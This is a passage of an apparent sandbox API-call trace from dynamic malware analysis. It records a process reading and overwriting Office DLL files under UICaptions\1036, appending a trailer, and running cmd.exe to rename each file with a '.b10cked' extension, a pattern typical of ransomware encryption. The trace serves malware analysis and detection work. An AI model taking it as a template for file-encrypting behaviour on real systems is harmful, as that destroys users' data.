| out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.144] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.144] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.144] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21093358458) returned 1 [0154.144] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.144] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.145] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.146] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xae78 [0154.146] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xb360 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xb360 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0154.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0154.833] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x59af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x59af, lpOverlapped=0x0) returned 1 [0154.841] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0154.841] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x59af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x59af, lpOverlapped=0x0) returned 1 [0154.841] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22959, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x59b1 [0154.841] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x59af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x59af, lpOverlapped=0x0) returned 1 [0154.843] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22959, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x59b1 [0154.843] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, 
nNumberOfBytesToWrite=0x59af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x59af, lpOverlapped=0x0) returned 1 [0154.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0154.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0154.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xb360 [0154.848] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0154.848] CloseHandle (hObject=0x114) returned 1 [0154.848] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX") returned 0x3c [0154.849] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0154.850] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, 
lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OMSINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x15c, dwThreadId=0x78c)) returned 1 [0154.851] CloseHandle (hObject=0x110) returned 1 [0154.852] CloseHandle (hObject=0x114) returned 1 [0154.852] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.852] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.852] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0154.852] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.852] ReleaseMutex (hMutex=0xf8) returned 1 [0154.852] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.852] ReleaseMutex (hMutex=0xf8) returned 1 [0154.852] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.852] ReleaseMutex (hMutex=0xf8) returned 1 [0154.852] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) 
returned 0x0 [0154.852] ReleaseMutex (hMutex=0xf8) returned 1 [0154.852] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.852] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21164148168) returned 1 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.852] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.853] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.853] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0154.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x7678 [0154.854] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, 
lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x7b60 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x7b60 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0154.910] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0154.956] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0154.956] 
WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0154.957] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15791, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3db1 [0154.957] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0154.957] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15791, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3db1 [0154.957] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0154.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0154.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0154.961] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x7b60 [0154.961] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0154.961] 
CloseHandle (hObject=0x114) returned 1 [0154.962] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX") returned 0x3c [0154.963] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0154.963] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: 